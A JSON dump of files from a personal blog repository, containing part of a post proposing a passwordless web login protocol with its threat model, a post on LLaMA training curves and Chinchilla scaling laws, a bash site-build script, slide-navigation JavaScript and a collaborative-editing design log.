lacking the LIP; and this remains true even if they additionally compromise the WK and database. Securitywise, this is a significant improvement compared to JWT, PASETO and similar session token approaches, which typically have anywhere from 5 minutes (for access tokens) to months of lifetime (for refresh tokens). An attacker reading a JWT refresh token in the encrypted payloads can typically use it to get unlimited access tokens for weeks if not ever. By contrast, with WebIdentity, the longest this attacker would be able to make authenticated queries is a minute, but usually half that (as most clients will not have much clock drift).\n - They can also read SignUp requests, although those will be rarer. The response includes the LISK, letting them fabricate valid TOTPs past 30 seconds. However, it will be invalidated through automatic logout after up to one hour. LISKs older than one hour will be useless to an attacker. On the other hand, if they can read the TLS traffic on-the-fly, they can view the new LISKs. As long as they maintain this ability, they can authenticate on behalf of the user. The flaw must be fixed by the website, and all LIDs invalidated, forcing a re-login.\n - If they compromise both the **website’s TLS encryption and its WK**:\n - For each AUID/LID/TOTP they see in the encrypted traffic, if the LID is still valid, they can derive the current LISK, and with it, perform authenticated requests for up to one hour (after which the automatic logout will prevent that).\n - Similarly, they can get the LISK from SignUps and LogIns. If they can read the traffic on-the-fly, they can see the new LISKs produced even after the one-hour logout. Again, the solution is to fix the flaw and invalidate the LIDs.\n - From **another website**: knowledge of that website’s AUID is insufficient to guess other websites’ AUID (that requires knowing the BK), let alone the LISK (which requires that website’s WK).\n - From the **user**: knowledge of the LISK is insufficient to guess WK, the Website Key, and therefore, to make authenticated requests on behalf of other users of the website. Additionally, even if they could, knowledge of other users’ AUID would be necessary, which requires knowing their BK.\n - From the **browser**: since it has access to the Sync secrets, it can perform authenticated requests and account takeover for all its registered users. However, it cannot do so for users of other browsers, if their BK is not explicitly shared.\n- Browser attack:\n - **XSS**: Since WebIdentity is controlled by the browser and has no JS integration, JS code cannot access secrets or perform authentication. All the exchanges and headers related to WebIdentity must be hidden from the page transparently. All same-origin requests are authenticated or not depending on whether the user has clicked the Log In button, and depending on the [credentials mode][]. Cross-site requests comply with CORS. The Authorization and WWW-Authenticate headers already have the right protections in place.\n - Browsers should never have BK on the device. They can store the websites’ KID, AUID and LISK. An attacker that gains access to the **device’s permanent or memory storage** will be unable to obtain the BK, and therefore sign up on new websites. They can however make authenticated requests on behalf of the user to websites in which they are signed up, for up to one hour after they lose access. It is therefore necessary for browsers to encrypt the Sync database (with the LISK) if they cache it locally, which is already the case. They should not use an encryption key that is common to multiple users (also already the case IIUC).\n - The Operating System and the CPU, on the other hand, can obviously access the BK **in memory** and perform authenticated requests and account takeover on behalf of the user, but not of other users.\n - **BK loss**: the Browser Sync could experience complete loss of data, including the BK, maliciously or accidentally. The consequence would be the same as a password manager, today, losing the passwords (which indeed is the main thing it wishes to guarantee as a business), or a website using WebAuthn as only primary authentication and the user losing their device (Yubico etc.): users would no longer be able to log in. However, people that switched browsers or backed up their BK would be able to add it back in using the *Browser Export* procedure.\n\n### Cryptographic comments\n\nThe whole scheme is both extremely inexpensive and simple to implement both for websites and browsers,\nespecially compared to current techniques (which involve, for instance, the expensive Argon2 for passwords).\nThe payload weigh is marginal.\n\nIt also does not make use of public-key cryptography,\nwhich protects it from the threat of quantum computing advances.\nThe main impact might be longer hashes, although even that is in question.\n\nThe protocol is versioned in such a way that there is no cryptographic algorithm agility,\nin line with common practices such as [age][] and [PASETO][].\n\nThe MAC algorithm for v1 of the protocol is HMAC-SHA256.\n\n(I would love to put BLAKE3 here, but some websites will object to a non-NIST-approved primitive.\nAnd SHA3 (with no HMAC!) would also be nice, I would love to argue for its use;\nbut it is true that some websites may have legacy and dependency constraints;\nand unlike WebAuthn, the goal of WebIdentity is to quickly get very widespread adoption\nas the primary authentication mechanism on the Web.)\n\nAll [base64url][] inputs must be converted to a byte buffer prior to use.\nThe implementation should be constant-time.\n\nThe eTLD+1 must be in ASCII punycode form for use in WebIdentity (simplifying debugging).\n\n## Vectors\n\nThe examples use:\n\n- Website eTLD+1: `example.org`.\n- BK: `GVr2rsMpdVKNMYkIohdCLhOeHSBIL8KBjoCvleDbsJsK` (generated with `head -c 32 </dev/urandom | base64 | tr +/ -_`).\n- WK: `DCmk1xzu05QmT578_9QUSckIjCYRyr19W0bf0bMb46MK`.\n- MACs generated with `echo -n \"$input\" | openssl sha256 -hmac \"$key\" | cut -f2 -d' ' | xxd -r -p | base64 | tr +/ -_ | tr -d =`.\n\nThe script to generate the examples is available [here][TestVectors];\nrunning it yields all values used in examples.\n\n## Acknowledgements\n\nThanks go to /u/josejimeniz2 for considering the risk of Sync data loss,\nand to /u/haxelion for raising the risk of having the BK on the device\n(which is no longer the case in the current draft).\n\n## Comments and links\n\n[Blog comments here](https://www.reddit.com/r/espadrine/comments/hlrx40/webidentity_oneclick_passwordless_signups_logins/).\n\n[MemorablePasswords]: https://espadrine.github.io/blog/posts/memorable-passwords.html\n[line of death]: https://textslashplain.com/2017/01/14/the-line-of-death/\n[PublicSuffix]: https://publicsuffix.org/\n[RegistrableDomain]: https://chromium.googlesource.com/chromium/src/+/master/docs/security/url_display_guidelines/url_display_guidelines.md#registrabledomain\n[credentials mode]: https://fetch.spec.whatwg.org/#ref-for-concept-request-credentials-mode\n[CloudFlare memory leak]: https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/\n[age]: https://github.com/FiloSottile/age\n[PASETO]: https://paragonie.com/files/talks/NoWayJoseCPV2018.pdf\n[BLAKE3]: https://github.com/BLAKE3-team/BLAKE3-specs/blob/master/blake3.pdf\n[base64url]: https://tools.ietf.org/html/rfc4648#section-5\n[WebAuthn]: https://webauthn.guide/\n[Apple]: https://developer.apple.com/videos/play/wwdc2020/10670/\n[quantum-resistant]: https://en.wikipedia.org/wiki/SHA-3#Security_against_quantum_attacks\n[TestVectors]: https://github.com/espadrine/espadrine.github.com/blob/master/blog/assets/webidentity/test-vectors.sh\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-07-05T20:19:02Z\",\n \"keywords\": \"crypto, web\" }\n</script>\n"
},
{
"alpha_fraction": 0.7449715733528137,
"alphanum_fraction": 0.7656793594360352,
"avg_line_length": 45.94422149658203,
"blob_id": "42605c21f2564cd18fdb6664bc398c746cf86d09",
"content_id": "7be8e4a8408bdb1435153da7bf29c54a9a1d1ed6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11827,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 251,
"path": "/blog/src/chinchilla-s-death.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Chinchilla’s Death\n\n> “With more careful calculations, one can win; with less, one cannot”\n> — Sun Tzu, *The Art of War*.\n\nMaking extrapolations is crucial to avoid wasting our computing power on slow\nconvergence. After all, if you had to walk to the Everest,\nyou wouldn’t eyeball it: you would use a GPS.\n\nSometimes you have to look away from the GPS and onto the road, though.\nSometimes things don't extrapolate through simple formulae.\nIt was true for XIXth-century physicists with the [ultraviolet catastrophe][];\nit is true for LLMs too.\nWhat we estimate to be true near the center can deviate widely in the far lands…\n\n\n\n## What’s this Chinchilla thing anyway?\n\nSmaller models have fewer multiplications.\nThus they run faster. Thus they train faster.\nHowever, the theory goes, they eventually reach the limit of their capacity for\nknowledge, and their learning slows, while that of a larger model,\nwith a larger capacity, will overtake them and reach better performance\npast a given amount of training time.\n\nWhile estimating how to get the best bang for the buck during training,\nboth [OpenAI][scaling] and [DeepMind][chinchilla] attempted to draw the Pareto\nfrontier. They don’t state explicitly that they use that theory to draw it;\nthe closest quote that hints at this hidden assumption is from OpenAI:\n\n> We expect that larger models should always perform better than smaller models.\n> […]\n> A model with fixed size will be capacity-limited.\n\nThis presumption is the bedrock of how they compute the Pareto frontier.\nIn the Chinchilla work, figure 2 shows the training loss of a large number of\ntraining runs for models with varying size.\nAt a first glance, those curves follow the theory:\nthe smaller models initially have a lower loss (good),\nbut eventually it slows down,\nand gets overtaken by the curve from a larger model (bad).\n\n\n\nIn that chart, they drew grey dots every time they pinpointed the smaller model\nstarting to lose out to a larger model.\nThe grey line, the Pareto frontier, is how they computed their scaling laws.\n\nThe problem with this assumption is that\nwe have no idea what would happen if we let the smaller model train for longer,\nsince they stopped its training as soon as it was overtaken.\n\nEnter the LLaMA paper.\n\n## Can Chinchillas picture a Llama’s sights?\n\nEarlier this year, Meta trained four models with varying sizes.\nUnlike other works, they trained each of them for a very large amount of time;\neven the smaller ones.\n\nThey published the training run curves:\n\n\n\n1. Each curve first plummets in a **power law**,\n2. and then seemingly enters a **nearly-linear** decrease in loss\n (corresponding to a fairly constant rate of knowledge acquisition).\n3. At the very tip of the curve, they all break this line by **flattening**\n slightly.\n\nRight off the bat, I want to tackle a subtle misconception that people can have\nrelated to the end-of-curve flattening.\nThey are all trained with gradient descent using a variable learning rate\n(which is, roughly,\na hyperparameter for how much to go in the direction of the gradient).\nTo get a good training, they had to constantly decrease the learning rate,\nso that it can detect ever-subtler patterns in the source material.\nThe formula they use for that decrease is the most widely used:\nthe cosine schedule.\n\n\n\nAs you can see from the graph, towards the end of the training run,\nthe cosine schedule stops decreasing the learning rate at the speed which\nyielded such a good, near-linear training loss curve.\nThe slowdown in learning is an artefact of that.\nThe model does not necessarily cease to have\nthe capacity to learn at the same near-linear rate!\nIn fact, if we had more text to give it,\nwe would have stretched the cosine schedule,\nso its learning rate would have continued to go down at the same rate.\n\nThe model’s fitness landscape does not depend on the amount of data\nwe can feed its training; so the change in learning rate decrease\nis not well-justified.\n\nThat is not the main point of this article, though.\n\nThe training loss curve can be misleading in another way.\nSure, they are all trained on the same data;\nbut they don’t go through that data at the same speed.\nWhat we want to know is **not** how sample-efficient the model is\n(on this front, the larger model clearly learns more from what it saw).\nLet’s picture instead a race:\nall those models start at the same time,\nand we want to know which one crosses the finish line first.\nIn other words, when throwing a fixed amount of compute at the training,\nwho learns the most in that time?\n\nThankfully, we can combine the loss curves with another piece of data that Meta\nprovided: the amount of time that each model took to train.\n\n<table>\n <tr><th> Model </th><th> GPU-hours </th><th> Tokens/second </th>\n <tr><td> LLaMA1-7B </td><td> 82432 </td><td> 3384.3 </td>\n <tr><td> LLaMA1-13B </td><td> 135168 </td><td> 2063.9 </td>\n <tr><td> LLaMA1-33B </td><td> 530432 </td><td> 730.5 </td>\n <tr><td> LLaMA1-65B </td><td> 1022362 </td><td> 379.0 </td>\n</table>\n\n\n\n[*(Code for generating the graph here.)*][code]\n\nLet’s first mention that the whole Chinchilla graph that we saw,\ncovers only a small sliver on the left of this graph.\nIn that sliver, we see the same behaviour that Chinchilla documents.\nLook at the 7B, for instance (which in the Chinchilla graph would actually be\namong the top two curves in terms of size):\nit initially drops its loss much faster than the bigger models, then slows down,\nand the 13B model overtakes it and reaches 1.9 first.\n\nBut then, comes a far-lands, unexpected twist: the 7B enters a near-linear\nregime, with a steep downward trend, and seems on its way to maybe overpass the\n13B again? It is hard to tell on that graph what would happen if the 7B was\ntrained for longer.\n\nHowever, the same behaviour seemed to be true between the 13B and the 33B,\nwhere the initial Chinchilla slowdown also gives way to a near-linear regime,\nat which point the 13B goes down fast! It is only surpassed by the 33B unfairly,\nby granting the latter more than double the compute time.\n\nAnd the same slowdown-then-speedup occurs between the 33B and the 65B,\nto such an extent that the 33B never actually gets overtaken by the 65B.\nWhat the graph shows breaks OpenAI’s and Chinchilla’s assumption:\n**the bigger model hasn’t won** (yet).\nThe slowdown they detected is not actually caused by reaching some capacity limit!\n\nStill, that 7B line is a bit unsatisfactory.\nIf only Meta had trained it for longer…\n\nSuspense over: they did! They released LLaMA 2 this week!\n\n## Time to confirm our suspicions\n\n\n\nWe also, again, got the training times:\n\n<table>\n <tr><th> Model </th><th> GPU-hours </th><th> Tokens/second </th>\n <tr><td> LLaMA2-7B </td><td> 184320 </td><td> 3031.9 </td>\n <tr><td> LLaMA2-13B </td><td> 368640 </td><td> 1515.9 </td>\n <tr><td> LLaMA2-34B </td><td> 1038336 </td><td> 533.7 </td>\n <tr><td> LLaMA2-70B </td><td> 1720320 </td><td> 322.1 </td>\n</table>\n\n\n\nImmediately, at a glance, we notice that the training curves don’t match those\nof LLaMA 1, even when the models are identical.\nAs it turns out, LLaMA 2 was trained on double the context size,\nand a longer cosine schedule, which unfortunately\nhas negatively impacted all model sizes.\nHowever, smaller models have been impacted worse than larger ones.\nAs a result, the 34B model, which in LLaMA 1 remained always better than the 65B\nmodel at any training time spent, now dips slightly above the 70B model,\nbefore overtaking it:\n\n\n\nMore importantly, comparing the training speeds strongly confirms our suspicions\nfrom LLaMA 1:\n\n1. First, they are faster than bigger models,\n2. Then, they slow down, and are overtaken by larger models (as per\n Chinchilla),\n3. BUT THEN, they enter the near-linear regime, in which smaller models have a\n steeper descent into superior knowledge, and they overtake larger models\n yet again!\n\nA fascinating consequence ties into making the right choices\nwhen starting a training run:\ncontrary to popular belief, **larger models yield worse results**.\nIf you had to pick a parameter size and dataset, you might be better off opting\nfor a 7B model and training for 7 epochs on trillions of tokens.\n\nLook at the near-linear regime of the 7B model, and extrapolate its line to when\nthe 70B model stopped:\nhad the 70B computation been spent on the 7B instead,\nit would potentially have reached a lower perplexity!\n\nAnother thing we notice from LLaMA 2 is that the learning slowdown at the end of\nthe LLaMA 1 curves was indeed an artefact of the cosine schedule.\nThat slowdown is completely absent from the LLaMA 2 training run at the\ncorresponding mark of 1 trillion tokens read.\n\nIn fact, maybe the reason that, at that same mark, the LLaMA 2 7B model has a\nworse quality than the LLaMA 1 7B model had,\nmay be because *its cosine schedule is stretched*!\n\nLet’s go back to the Chinchilla paper to argue that point.\nIn appendix A, figure A1, they show an ablation study for various cosine\nschedule parameters (phrased another way:\nvarious ways to stretch the learning rate curve).\n\n\n\nThey make the point that the lowest loss is achieved when the curve is not\nstretched. That is supported by the graphs, but we notice something off.\nAfter reading 6 million tokens, the training loss at the top is below 2.8;\nmeanwhile, at the same mark, the training loss of the bottom model is above.\nYet the only difference between the models is the cosine schedule!\nBecause the bottom model was slated to go through more training data,\nthe “unstretched” cosine schedule was computed for a bigger number of steps,\nwhich effectively stretches it.\nIf the learning rate had instead followed\nthe schedule assigned to fewer training steps,\nit would have had a better loss for the same amount of training time.\n\nMore broadly, that raises a question that I leave open:\nif the cosine schedule is not optimal,\nhow should the shape of its tail be instead?\n\n[ultraviolet catastrophe]: https://en.wikipedia.org/wiki/Ultraviolet_catastrophe\n[scaling]: https://arxiv.org/abs/2001.08361\n[chinchilla]: https://arxiv.org/abs/2203.15556\n[llama1]: https://arxiv.org/abs/2302.13971\n[llama2]: https://arxiv.org/abs/2307.09288\n[cosine]: https://arxiv.org/pdf/1608.03983.pdf\n[code]: https://github.com/espadrine/espadrine.github.com/blob/master/blog/assets/chinchilla-s-death/llama-data.py\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2023-07-23T17:35:02Z\",\n \"keywords\": \"gpu, ml\" }\n</script>\n"
},
{
"alpha_fraction": 0.697982132434845,
"alphanum_fraction": 0.7254382967948914,
"avg_line_length": 72.75609588623047,
"blob_id": "291fe7bf8c4220e3b2b74a9e5c71c466ea01b794",
"content_id": "89c12de97e74feaf033e51e7007d7ea9046b2a2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 3032,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 41,
"path": "/blog/posts/what-i-made-on-year-2014.html",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "<!doctype html><meta charset=utf-8>\n<title> What I Made On Year 2014 </title>\n<link href=../blog.css rel=stylesheet>\n<link rel=\"stylesheet\" href=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/katex.min.css\" integrity=\"sha384-AfEj0r4/OFrOo5t7NnNe46zW/tFgW6x/bCJG8FqQCEo3+Aro6EYUG4+cU+KJWu/X\" crossorigin=\"anonymous\">\n<link rel=\"stylesheet\" href=\"https://cdn.jsdelivr.net/gh/highlightjs/[email protected]/build/styles/default.min.css\">\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"Atom 1.0\" href=\"feed.xml\"/>\n<link rel=\"alternate\" type=\"application/json\" title=\"JSON Feed\" href=\"feed.json\" />\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n<main>\n <nav class=social-links>\n <object type='image/svg+xml' data='https://img.shields.io/badge/blog-46-green?style=social&logo=rss&logoColor=e5732f&link=https://espadrine.github.io/blog/&link=https://espadrine.github.io/blog/feed.xml'></object>\n <object type='image/svg+xml' data='https://img.shields.io/github/followers/espadrine?label=Github&style=social&link=https%3A%2F%2Fgithub.com%2Fespadrine&link=https%3A%2F%2Fgithub.com%2Fespadrine%3Ftab%3Dfollowers'></object>\n <object type='image/svg+xml' data='https://img.shields.io/twitter/follow/espadrine?label=Twitter&style=social'></object>\n </nav>\n <article class=relative>\n<h1 id=\"What_I_Made_On_Year_2014\">What I Made On Year 2014 <a href=\"#What_I_Made_On_Year_2014\" class=\"autolink-clicker\" aria-hidden=\"true\">§</a></h1>\n<p>Open-source-wise:</p>\n<ul>\n<li>http://Shields.io (The first commit was, in fact, a year ago)</li>\n<li>A syntax sheet converter <a href=\"https://github.com/espadrine/ace2cm\">Ace → CodeMirror</a></li>\n<li><a href=\"http://espadrine.github.io/AsciiDocBox/\">Live AsciiDoc Editor</a> (side-by-side)</li>\n<li>Node Canvas <a href=\"https://github.com/Automattic/node-canvas/pull/465\">SVG support</a>. Write your node code with a Canvas API, get SVG back out.</li>\n<li>http://TheFileTree.com passwords and program jail, although I keep those features hidden. This year, it will allow you to write LaTeX and get the PDF back from anywhere.</li>\n<li>Not My Territory, a game I design: I got its rules right. Now, to finish implementing it…</li>\n</ul>\n<p>Otherwise, I got a diploma in engineering, got hired at https://www.capitainetrain.com, implemented comfort classes (a sub-division of travel classes for some trains), a card store page, invoices and a few other things.</p>\n<p>It’s quite fun to no longer be tied to strange decisions and absurd, chronophage school projects.</p>\n<p>I hope to do even bigger things this year, many being continuations on this year’s achievements, some (hopefully) being outstanding surprises.</p>\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-01-03T22:51:00Z\",\n \"keywords\": \"retro\" }\n</script>\n <footer>\n Published <time itemprop=datePublished datetime=\"2015-01-03T22:51:00Z\">3 January 2015</time>.\n <br>\n Tags: <a class=tag href=\"../index.html?tags=retro\">retro</a>.\n </footer>\n </article>\n</main>"
},
{
"alpha_fraction": 0.5142994523048401,
"alphanum_fraction": 0.5159817337989807,
"avg_line_length": 29.822221755981445,
"blob_id": "a8917bbfd90561a499c0c765e6d373aa4077a9ee",
"content_id": "0a55e1713b4af1220e310c562ffda61245a6819b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 4161,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 135,
"path": "/blog/build.sh",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ndir=$(dirname \"$BASH_SOURCE\")\ntemplate=$(cat \"$dir\"/template.html)\nlast_year=$(date -I -d 'last year')\nmkdir -p .cache/html\n\npost_links=\njsonfeed_items=\natomfeed_entries=\nlast_publication_date=\n\npublications=$(ls \"$dir\"/src/*.md | sed 's,^.*/,,; s,\\.md$,,' | \\\n { while read src; do\n echo $(<\"$dir/src/$src.md\" grep '^ \"datePublished\"' | \\\n cut -d'\"' -f4 | cut -d' ' -f2)$'\\t'\"$src\";\n done } | sort)\npubcount=$(echo \"$publications\" | wc -l)\n\necho \"$publications\" | {\n while read post; do\n name=$(echo \"$post\" | cut -d$'\\t' -f2)\n mdfile=\"$dir/src/$name\".md\n htmlfile=\"$dir/posts/$name\".html\n htmlcachefile=\"$dir/.cache/html/$name\".html\n isotime=$(echo \"$post\" | cut -d$'\\t' -f1)\n last_publication_date=\"$isotime\"\n time=$(date +'%-d %B %Y' -d \"$isotime\")\n\n # Metadata update.\n markdown=$(cat \"$mdfile\")\n title=$(echo \"$markdown\" | head -1 | sed 's/^# //')\n titlehtml=$(echo \"$title\" | sed 's/&/&/g')\n meta=$(echo \"$markdown\" |\n awk '/^<script type=\"application\\/ld/ {keep=1;next} /^<\\/script>/ {keep=0} keep')\n keywords=$(echo \"$meta\" | jq -r .keywords)\n tags=$(echo \"$keywords\" | sed 's/, */ /g')\n\n # Article page generation.\n if [[ ! -a \"$htmlcachefile\" || \"$mdfile\" -nt \"$htmlcachefile\" ]]; then\n echo \"Generating $name\"\n # The file has an update; otherwise skip its generation.\n markdown=${markdown:-$(cat \"$mdfile\")}\n content=$(echo \"$markdown\" | latexmarkdown --body)\n echo \"$content\" >\"$htmlcachefile\"\n html_tags=$(for k in $tags; do\n echo \" <a class=tag href=\\\"../index.html?tags=$k\\\">$k</a>\";\n done | sed '$!s/$/,/')\n echo -n \"$template\" \\\n | sed '\n /TAGS/ {\n r '<(if [[ \"$html_tags\" ]]; then\n echo ' Tags:'\"$html_tags\".;\n fi)'\n d\n }\n s\u001fTITLE\u001f'\"$titlehtml\"'\u001f\n s\u001fPUBCOUNT\u001f'\"$pubcount\"'\u001f\n s\u001fISOTIME\u001f'\"$isotime\"'\u001f\n s\u001fTIME\u001f'\"$time\"'\u001f\n /POST/ {\n r '<(echo \"$content\")'\n d\n }' \\\n > \"$htmlfile\"\n fi\n\n # Index page generation.\n index_html_tags=$(for k in $tags; do\n echo \" <a class=tag href=\\\"?tags=$k\\\">$k</a>\";\n done | sed '$!s/$/,/')\n post_links=$(cat <<EOF\n <li data-tags=\"$keywords\">\n <a href=\"posts/$name.html\">$titlehtml</a>\n $(if [[ \"$index_html_tags\" ]]; then\n echo \"<span class=post-tags>Tags:$index_html_tags</span>\";\n fi)\n </li>\n$post_links\nEOF\n )\n\n # RSS feeds generation.\n # We expect RSS feed clients to poll at least once a year.\n if [[ \"$isotime\" > \"$last_year\" ]]; then\n content=$(cat \"$htmlcachefile\")\n jsonfeed_items=$(cat <<EOF\n {\n \"id\": \"https://espadrine.github.io/blog/posts/$name.html\",\n \"url\": \"https://espadrine.github.io/blog/posts/$name.html\",\n \"title\": $(echo \"$title\" | jq . -R),\n \"tags\": \"$tags\",\n \"date_published\": \"$isotime\"\n \"content_html\": $(echo \"$content\" | jq . -Rs),\n },\nEOF\n )$'\\n'\"$jsonfeed_items\"\n\n atom_categories=$(for k in $tags; do\n echo \"<category term=\\\"$k\\\"/>\";\n done)\n atomfeed_entries=$(cat <<EOF\n <entry>\n <id>https://espadrine.github.io/blog/posts/$name.html</id>\n <link rel=\"alternate\" type=\"text/html\" href=\"https://espadrine.github.io/blog/posts/$name.html\"/>\n <title>$(echo \"$titlehtml\" | sed 's,<,<,g'$'\\n''s,>,>,g')</title>\n <published>$isotime</published>\n $atom_categories\n <content type=\"html\">\n <![CDATA[ $content ]]>\n </content>\n </entry>\nEOF\n )$'\\n'\"$atomfeed_entries\"\n fi\n done\n\n < \"$dir\"/index-template.html sed '\n /POST_LINKS/ {\n r '<(echo -n \"$post_links\")'\n d\n }' > \"$dir\"/index.html\n jsonfeed_items=\"${jsonfeed_items%??}\"$'\\n'\n < \"$dir\"/feed-template.json sed '\n /ITEMS/ {\n r '<(echo -n \"$jsonfeed_items\")'\n d\n }' > \"$dir\"/feed.json\n < \"$dir\"/feed-template.xml sed '\n s\u001fLAST_PUBLICATION_DATE\u001f'\"$last_publication_date\"'\u001f\n /ENTRIES/ {\n r '<(echo -n \"$atomfeed_entries\")'\n d\n }' > \"$dir\"/feed.xml\n}\n"
},
{
"alpha_fraction": 0.6597892642021179,
"alphanum_fraction": 0.6703248620033264,
"avg_line_length": 31.542856216430664,
"blob_id": "38f62e6b54691d86401e6976d9ee5675c5d3ac4d",
"content_id": "d930dfaae9af40d5a4e6e73a189163fd60e3fdde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2280,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 70,
"path": "/⚒/☕.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "// Configuration for the animation.\nvar slideTime = 100; // duration in ms.\nvar minTimeSlice = 17; // ← 60fps.\n\n// Controls for the slides: right = forward, left = back.\nwindow.addEventListener('keydown', function(e) {\n var slide = visibleSlide();\n if (e.keyCode === 39 && (slide = nextSlide(slide))) {\n slide.slideIntoView();\n } else if (e.keyCode === 37 && (slide = prevSlide(slide))) {\n slide.slideIntoView();\n }\n});\n\nfunction nextSlide(slide) {\n while (slide.nextElementSibling &&\n slide.nextElementSibling.tagName !== 'SLIDE') {\n slide = slide.nextElementSibling;\n }\n return slide.nextElementSibling;\n}\n\nfunction prevSlide(slide) {\n while (slide.previousElementSibling &&\n slide.previousElementSibling.tagName !== 'SLIDE') {\n slide = slide.previousElementSibling;\n }\n return slide.previousElementSibling;\n}\n\n// Keep track of the current slide.\n// Returns the first slide below the top of the viewport.\nfunction visibleSlide() {\n var slides = document.getElementsByTagName('slide');\n for (var i = 0; i < slides.length; i++) {\n var slideBounds = slides[i].getBoundingClientRect();\n var middleOfSlide = (slideBounds.bottom + slideBounds.top) / 2;\n if (middleOfSlide >= 0) {\n // First slide that's below the viewport.\n return slides[i];\n }\n }\n}\n\n// Animation to slide an element to the center of the viewport.\nElement.prototype.slideIntoView = function() {\n var rect = this.getBoundingClientRect();\n var endy = window.scrollY + rect.top\n - (window.innerHeight - this.offsetHeight) * 0.5;\n var jumpNPixels = 20;\n var signy = endy - window.scrollY > 0? 1: -1;\n var count = 0;\n var total = Math.abs(window.scrollY - endy);\n var timeSlice = slideTime / Math.abs(window.scrollY - endy) * jumpNPixels;\n if (timeSlice < minTimeSlice) {\n jumpNPixels = minTimeSlice * Math.abs(window.scrollY - endy) / slideTime;\n timeSlice = slideTime / Math.abs(window.scrollY - endy) * jumpNPixels;\n }\n // Scroll by jumpNPixels till we get to the slide.\n var intervalid = setInterval(function() {\n window.scrollBy(0, signy * jumpNPixels);\n count += jumpNPixels;\n if (count >= total) {\n clearInterval(intervalid);\n window.scroll(0, endy);\n }\n }, timeSlice);\n};\n\n// vim: ft=javascript\n"
},
{
"alpha_fraction": 0.7790359258651733,
"alphanum_fraction": 0.7838886976242065,
"avg_line_length": 72.5952377319336,
"blob_id": "6cf5de3f6c42f549f106b6e2bc7d2e1a155f54f9",
"content_id": "ce3c5852b794eae1d34a8d963442eb6aae60a911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3093,
"license_type": "no_license",
"max_line_length": 366,
"num_lines": 42,
"path": "/blog/src/thefiletree-design-log-3.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 3: Collaborative Editing\n\nI finally implemented the following API:\n\n- `GET /file?op=edit&app=text` (WebSocket): use the [Canop][] protocol to synchronize the file's content and autosave it.\n\n[Canop]: https://github.com/espadrine/canop\n\nTo get there, I improved Canop to finalize its protocol and survive disconnections. I made it more resilient to edge-cases and streamlined its API. I even added the ability to create brand new fundamental operations as a Canop user.\n\nI chose to go with [Canop][] instead of [jsonsync][], even though I appeared to lean towards the latter in previous design logs, because implementing index rebasing is non-trivial (especially for jsonsync), and I had already mostly done so with Canop.\n\nOn the other hand, it only supports strings. The protocol is designed to allow full JSON data, however. Additionally, strings are by far the harders data type to implement synchronization for. Arrays are slightly easier (and the index rebasing necessary to make them work is the same as that for strings), and the others are trivial.\n\n[jsonsync]: https://github.com/espadrine/jsonsync\n\n## User Interface\n\nI have designed Canop with certain events to allow for the display of the synchronization state (unsyncable (ie, offline), syncing, and synced).\n\nThis was problematic in thefiletree.com previously, as it was not at all clear whether we had suddenly been disconnected, and there were no reconnection. Closing the tab could therefore cause us to lose our changes… Yet there was no save button.\n\n## Details\n\nI don't save the edit history server-side, so local operations after a disconnection won't be able to rebase on top of other operations. I get the feeling that past a few seconds of disconnection, concurrent editing can severely damage the user's intended edition, as rebased operation may lose what the user entered without them having seen someone's cursor arrive.\n\n(Of course, nothing precludes someone from deleting the whole file, removing your changes, but that is malice, not accident. What we want to forbid are accidental loss. Malicious changes are inevitable; or rather, being resistant to them requires complex graph synchronization, solving the byzantine generals problem, and saving the full non-linear edit history.)\n\nI don't even save the file's revision number, so the client cannot tell whether there has been zero changes since the disconnection and apply local changes from there.\n\nMy plan: save the revision number so that local changes can be applied without a sweat when the file wasn't concurrently modified.\n\nIf it was, download a diffing library, and perform a diff. Display a visualization of the changes that would be applied to the local document (with local changes) if upstream changes were applied, and local changes rebased on top of them.\n\n\"Do you want to apply remote changes?\" Yes / No, save my document at a new location.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-04-02T19:19:00Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.7096590995788574,
"alphanum_fraction": 0.765625,
"avg_line_length": 63.587154388427734,
"blob_id": "8a8e1a4ca4bebbec9724ebe8d30b55a698a82e9e",
"content_id": "52c123ac04f92681a2fd9c33b99557aac6841941",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7044,
"license_type": "no_license",
"max_line_length": 424,
"num_lines": 109,
"path": "/blog/src/noisy-background-image.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
